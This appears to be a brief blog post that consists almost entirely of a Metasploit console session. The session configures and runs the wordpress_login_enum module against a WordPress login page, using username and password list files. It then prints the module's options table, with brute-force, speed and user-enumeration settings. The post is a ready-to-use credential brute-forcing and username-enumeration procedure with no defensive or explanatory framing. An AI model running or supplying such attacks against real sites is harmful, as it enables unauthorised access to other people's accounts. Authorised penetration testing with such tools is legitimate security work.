control – metasploit wordpress_login_enum

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set URI /wordpress/wp-login.php
URI => /wordpress/wp-login.php
msf auxiliary(wordpress_login_enum) > set PASS_FILE /tmp/passes.txt
PASS_FILE => /tmp/passes.txt
msf auxiliary(wordpress_login_enum) > set USER_FILE /tmp/users.txt
USER_FILE => /tmp/users.txt
msf auxiliary(wordpress_login_enum) > set RHOSTS (IP Address)
RHOSTS => (IP Address)
msf auxiliary(wordpress_login_enum) > run

msf auxiliary(wordpress_login_enum) > show options

Module options (auxiliary/scanner/http/wordpress_login_enum):

Name              Current Setting  Required  Description
—-              —————  ——–  ———–
BLANK_PASSWORDS   true             yes       Try blank passwords for all users
BRUTEFORCE        true             yes       Perform brute force authentication
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
Proxies                            no        Use a proxy chain
RHOSTS                             yes       The target address range or CIDR identifier
RPORT             80               yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads
URI               /wp-login.php    no        Define the path to the wp-login.php file
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_FILE                          no        File containing usernames, one per line
VALIDATE_USERS    true             yes       Enumerate usernames
VERBOSE           true             yes       Whether to print output for all attempts
VHOST                              no        HTTP server virtual host

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s